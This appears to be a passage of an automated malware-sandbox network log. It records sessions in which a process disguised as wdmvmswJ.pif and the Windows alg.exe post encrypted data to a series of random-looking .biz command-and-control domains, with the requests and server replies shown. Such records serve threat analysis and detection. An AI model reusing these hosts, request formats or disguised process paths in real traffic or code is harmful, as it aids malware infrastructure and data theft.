                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173372030 CET350OUTPOST /sbnab HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.173398018 CET778OUTData Raw: 9a 7a 11 97 58 89 45 17 fe 02 00 00 83 df 21 5c 9a b5 43 21 06 ed 3a 91 37 c4 a7 61 79 77 d0 cb 5f 4c 55 92 02 df cf 57 b8 a0 92 d3 07 e0 66 d3 c5 21 bc 5c 8d 16 66 43 0d 41 d8 9e 40 e0 e0 b7 88 8d a1 7f 78 66 44 c3 9c 20 92 09 0b 75 85 8c c9 21
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zXE!\C!:7ayw_LUWf!\fCA@xfD u!$3#cCe-diTOnVNu$ed)zh"cfT*~9E9rC\3p5apK9tu`<\7C<m!Fg]1cRGj7SL
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.866695881 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=abd5c6b61624e0d3d131ad6d1006f6f8|173.254.250.82|1730445879|1730445879|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        108192.168.2.84987018.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495888948 CET353OUTPOST /dvarulpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.495959997 CET802OUTData Raw: 16 51 5a 43 e8 8b dc 6d 16 03 00 00 04 5b f1 f8 32 06 b3 c3 76 aa f9 24 90 98 57 d3 d5 23 04 d7 00 1b 10 7d ab 8c 53 30 52 09 fc e2 8b f5 4b d5 04 de a4 93 83 0d 50 69 2f 98 9f 9f cb ec d8 ed b0 d8 f5 50 44 f0 18 7f 42 a3 11 e1 c8 3c 11 cb 00 0e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: QZCm[2v$W#}S0RKPi/PDB<'"l9[0Dpf|b=cr96erw"`,OadI}&d{=CT/o'tq'w5C>vnZ7-CCE+(a,|+0
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.171138048 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b7f48eda2e065505457d20d370d50afb|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        109192.168.2.84987518.246.231.120804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175878048 CET354OUTPOST /tfbvwglkixk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.175901890 CET778OUTData Raw: a7 d8 59 c7 17 0e 69 c7 fe 02 00 00 ec 63 de 10 8b 08 56 cf 32 ea 5e c7 22 aa 23 67 91 14 76 06 79 e8 59 f5 80 a6 dd 47 83 46 43 8e a3 23 0d 9d cf 13 ff 97 df bd dd 6b 0d 2c c4 fa 4c 62 91 ac 92 b9 c9 a5 bf c2 0a 09 6f 9d cf ae b8 7c 42 17 d9 30
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: YicV2^"#gvyYGFC#k,Lbo|B06mHyLXM1y94G5<ZkCmL(,AsE^-Cj!MCSt4+xFktQ>0O3MOVQe/1DBd.Pq+6DQu\q
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.033015013 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9ba31ad66d9181fe8dbf6cc1fc087220|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        110192.168.2.84987718.246.231.120804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.235758066 CET349OUTPOST /noubyejh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.235780001 CET802OUTData Raw: 46 25 b3 be eb 26 1e 6c 16 03 00 00 3e 2f 2e b7 e2 e0 89 3d 4d 9e ee c9 d5 44 db 03 90 8b 6f ac a7 d9 4f b2 c1 80 21 34 6e 2c 23 97 3b b4 4c 16 81 6d de 36 c0 6c df 30 ff 42 e5 36 54 c5 40 d1 a7 44 32 96 8b 92 fa 69 95 30 d0 82 19 0c 9c 7a 2c b5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: F%&l>/.=MDoO!4n,#;Lm6l0B6T@D2i0z,h$=Z^w`*&Ikjl^y9;)aQBR+Fe&Uf]e:u+]_+<_CUXutR}.x2db`Z:Dv_Dyf21$"
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.074980021 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=052543000529ebdc737d6603776f83d0|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        111192.168.2.84988244.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET353OUTPOST /cdrlubbsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET802OUTData Raw: b5 a4 31 2e 3c 32 5b 6f 16 03 00 00 81 03 c4 6c 52 f9 c2 bf b1 58 46 aa 98 70 70 a8 b3 dc 46 56 ea 36 e6 c2 69 b6 a6 68 17 9b 97 e1 5f cf ba 40 45 ae ab ae d3 b5 86 dc bd 82 54 52 3c 45 38 c9 59 f9 a4 88 b5 f8 f3 f3 3c 5e 9c 6c a0 c0 fe 1f d9 a6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1.<2[olRXFppFV6ih_@ETR<E8Y<^l7:G"pEW@wF$u6F3p&U_HjM;"{l:LV)?0jQp?k!=)ORWI4{#x=\*u`DtGlD1s+
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.821480989 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b61783641f357b0487d68ea8d0ccd3de|173.254.250.82|1730445881|1730445881|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        112192.168.2.8498833.254.94.185804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.274975061 CET348OUTPOST /qmfujjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.275019884 CET778OUTData Raw: e4 e7 5a b8 ec 14 3f 0a fe 02 00 00 5e 09 ca 00 9d 5b eb aa 33 1f b3 89 5e 4a 8b 3a a2 15 4a 47 51 89 b2 80 46 ed 67 03 2a 21 36 fb c1 9c 0a f5 85 e4 62 d6 b9 1d e2 71 b7 33 da dc 65 f5 1a 5f f7 c3 5d 55 94 b7 5c ac 96 51 50 6d ed b4 7b bc 8c 37
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Z?^[3^J:JGQFg*!6bq3e_]U\QPm{7*bt;QW!OW+5K\MmmwVkn4zVCZ8%5P2OJ//d{@5\i)>am}wfe16I[5n4AmKb#i}jTy
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.247014999 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4d2b77a791edd6d1c1fef6fd9f1979e8|173.254.250.82|1730445882|1730445882|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        113192.168.2.84988854.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876946926 CET347OUTPOST /dxlhs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.876962900 CET802OUTData Raw: 03 65 9d cc eb f9 38 32 16 03 00 00 97 d3 1c e0 af d2 c7 73 cb f8 ba 6b de 3e 3b 2d 51 4e dd 00 1d 48 e1 70 cb 3d f0 8a b5 05 35 95 4f 9e 53 b6 f6 8c b6 d5 2b 8e 2d 56 fc 2c 96 bd 36 84 0a 43 09 06 83 a9 40 c7 e8 05 9d ff 21 0e 13 e6 6d 98 2e 15
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e82sk>;-QNHp=5OS+-V,6C@!m.n80.`0GQ%pUD.FDyNL,v1ijeV)v-[n%6Xe/#x`<,Oosp14Kp8'XL%Yk1i7"?
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.800913095 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2b1754f0b5645cc6831f86c0d7b9bc35|173.254.250.82|1730445882|1730445882|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        114192.168.2.84989185.214.228.140804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.444330931 CET359OUTPOST /rgkgvuyxljjatio HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.444366932 CET778OUTData Raw: 22 db 20 73 c6 de 90 f6 fe 02 00 00 a1 fc ed 83 8d 28 49 50 0b 44 7f f5 93 72 4a 39 aa b4 dd 13 5c f3 a2 5d 7c 06 f9 02 03 ea 9e 39 ed d6 77 d9 4a bb cc cd 7d 1a 3e 9c 25 e7 3a 43 ab ac 10 38 7b c1 1b f2 44 cc 89 af 53 0c fe 7f 01 52 db f9 5a 3c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: " s(IPDrJ9\]|9wJ}>%:C8{DSRZ<b[9'g-Niu/2Q{dH<{pE0Eb/>\()]+0xp#kb2oU^o4'$:,z4vXtfV# L3^)Yt/!q
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.306997061 CET161INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.307116032 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        115192.168.2.8498953.254.94.185804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.854652882 CET343OUTPOST /ki HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.854671001 CET802OUTData Raw: fc f4 93 cc cf ed 92 57 16 03 00 00 75 8b 7d 96 47 8f 50 19 08 cb 6e cb 1e ed 05 2a c3 aa 9d 40 af a8 65 b7 8c c6 50 74 0f cf e5 c3 3c a9 a8 17 ad 0d 35 78 5b 4b ed 30 e7 88 29 86 c9 00 20 51 32 80 fc 27 0a 8f 72 2e 53 fc 7e 29 39 42 1a 34 6d b8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Wu}GPn*@ePt<5x[K0) Q2'r.S~)9B4mAT|qoC}j"`Pp\";D|*V]pX"Ev(hjk{q^h|Ybcm#VUN!3[!mgT?pD`qrHS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.842029095 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b4e8f90de47da1766fe3ec07d5925f96|173.254.250.82|1730445883|1730445883|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        116192.168.2.84990047.129.31.212804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.486875057 CET345OUTPOST /bq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.487070084 CET778OUTData Raw: c6 93 61 84 ea f8 f9 a7 fe 02 00 00 86 a0 19 35 db a0 2f ae ad 1e 76 8d 30 16 89 53 24 3b 8a 04 2d 6e 70 13 96 c9 4d 16 c9 87 53 d2 35 89 34 0b 24 58 cf c4 1d 8b 69 01 ae c8 1d 2e 9c f6 df 57 cf 0e fa 21 e4 90 2f 19 e9 35 ff 1b 88 e7 e6 1c 4f bf
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a5/v0S$;-npMS54$Xi.W!/5OP57utELT%1V{<{<<G>{]W{hycy0 _82XT%VSu:lf)b.T*0|MO_X#=Sw|n{j6)`!
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:44.950238943 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ea7f26f393ef50c8c574b69060f3bfbb|173.254.250.82|1730445884|1730445884|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


